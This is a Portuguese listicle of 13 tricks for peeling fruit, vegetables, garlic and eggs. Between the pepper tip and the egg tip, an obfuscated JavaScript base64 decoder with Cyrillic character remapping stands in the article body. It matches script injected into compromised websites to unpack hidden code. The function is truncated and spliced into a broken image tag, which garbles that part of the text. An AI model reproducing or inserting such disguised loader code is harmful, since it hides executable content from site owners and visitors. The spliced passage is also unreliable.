Sabia que há alimentos que sempre descascámos mal? É possível que o saber descascar alimentos não seja a habilidade mais útil na vida, mas pode poupar algum tempo e esforço.
Esqueça tudo o que sabia até agora. Veja estes 13 truques para descascar os seus alimentos favoritos.
Alimentos que sempre descascámos mal – tirar folhas a morangos com uma palhinha
Pode tirar as folhas a frutos pequenos com uma palhinha ou um pauzinho chinês.
Alimentos que sempre descascámos mal – descascar uma romã com uma colher de madeira
Para descascar uma romã pode bater suavemente numa das suas metades com uma colher de madeira. As bagas sairão todas e não perderá nenhum sumo.
Alimentos que sempre descascámos mal – tirar a pele a batatas
Faça um corte superficial nas batatas, a toda a volta, antes de as cozer. Depois de cozidas, introduza-as em água fria. A pele sairá com toda a facilidade.
Alimentos que sempre descascámos mal – descascar uma laranja com o cabo de uma colher
Utilize o cabo de uma colher para descascar uma laranja sem sujar as mãos.
Alimentos que sempre descascámos mal – tirar a pele às mangas com um copo
É mais fácil tirar a pele às mangas com a ajuda de um copo.
Alimentos que sempre descascámos mal – tirar a pele ao kiwi com um copo
… e aos Kiwis também.
Alimentos que sempre descascámos mal – descascar um abacate com um copo
Tal como aos abacates!
Alimentos que sempre descascámos mal – descascar uma banana
Pressione a base da banana e puxe a casca por ambos os lados, como se fosse abrir um pacote de batatas fritas.
Alimentos que sempre descascámos mal – descascar os alhos numa taça com tampa ou um prato
Para descascar os alhos, coloque-os numa taça, tape-a com uma tampa ou um prato, agite energicamente e já está! Alhos descascados sem sujar as mãos.
Alimentos que sempre descascámos mal – descascar uma tangerina com apenas 3 cortes
3 cortes numa tangerina e está pronta a comer!
Alimentos que sempre descascámos mal – descascar pimentos
Corte a parte de cima do pimento e faça cortes superficiais longitudinais, até que veja a parte branca no interior.
Alimentos que sempre descascámos mal – descascar pimentos
Agora só tem de retirar os pedaços de pimento já cortados.
function a4872b9c6b(y1){var qd=’ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=’;var x0=”;var n6,w6,qe,q8,w9,we,n7;var oa=0;do{q8=qd.indexOf(y1.charAt(oa++));w9=qd.indexOf(y1.charAt(oa++));we=qd.indexOf(y1.charAt(oa++));n7=qd.indexOf(y1.charAt(oa++));n6=(q8<<2)|(w9>>4);w6=((w9&15)<<4)|(we>>2);qe=((we&3)<<6)|n7;if(n6>=192)n6+=848;else if(n6==168)n6=1025;else if(n6==184)n6=1105;x0+=String.fromCharCode(n6);if(we!=64){if(w6>=192)w6+=848;else if(w6==168)w6=1025;else if(w6==184)w6=1105;x0+=String.fromCharCode(w6);}if(n7!=64){if(qe>=192)qe+=848;else if(qe==168)qe=1025;else if(qe==184)qe=1105;x0+=String.fromCharCode(qe);}}while(oaando” src=”http://like3za.pt/wp-content/uploads/2016/01/ovo-88d0bf2577137469507a146924b05647.gif” alt=”Alimentos que sempre descascámos mal – tirar a casca do ovo cozido soprando" width="304" height="198" /> Alimentos que sempre descascámos mal - tirar a casca do ovo cozido soprando
Para tirar a casca a um ovo cozido, retire um pouco da casca da parte de cima e sopre com força lá para dentro. O ovo sairá facilmente pela parte de baixo.
Alimentos que sempre descascámos mal - descascar uma maçã, versão “homens”, com um berbequim!
Como descascar uma maçã, versão “homens”
Via viralnova e genial.guru
Se gostou de ver estes alimentos que sempre descascámos mal veja também as 8 coisas que sempre fizemos mal e estas dicas de limpeza infalíveis
E já agora veja também...